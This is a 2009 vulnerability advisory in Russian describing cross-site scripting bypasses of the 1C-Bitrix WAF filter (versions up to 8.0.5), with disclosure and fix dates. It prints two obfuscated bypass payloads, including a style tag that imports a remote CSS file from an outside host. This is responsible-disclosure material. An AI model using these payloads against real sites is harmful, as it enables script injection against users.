[ONSEC-09-014] 1C Bitrix WAF multiple XSS

2009-09-28T00:00:00
ID SECURITYVULNS:DOC:22523
Type securityvulns
Reporter Securityvulns
Modified 2009-09-28T00:00:00

Description

Цель: 1C Bitrix WAF <=8.0.5 Тип: Межсайтовый скриптинг Угроза: Средняя Дата обнаружения: 29.08.2009 Дата оповещения разработчика: 29.08.2009 Дата выхода исправления: 01.09.2009 Автор: Vladimir Vorontsov OnSec Russian Security Group (onsec [dot] ru) Описание: Проактивный фильтр WAF системы управления контентом 1С-Битрикс осуществляет проверку входных данных пользователя на наличие потенциально опасных строк. Он имеет огромную базу регулярных выражений и фильтрует множество вариантов реализаций SQL инъекций, Includes, XSS. Обход фильтра был найден после недолгого подбора по следующим векторам:

<style> @\69\6D\70\6F\72\74 url(http://onsec.ru/xss.css); </style>

e&#92xp&#92re&#92s&#92s&#92i&#92o&#92n

Из-за ограниченного времени исследователя, других попыток обойти фильтр сделано не было. Затраченное время на подбор составило 40 минут.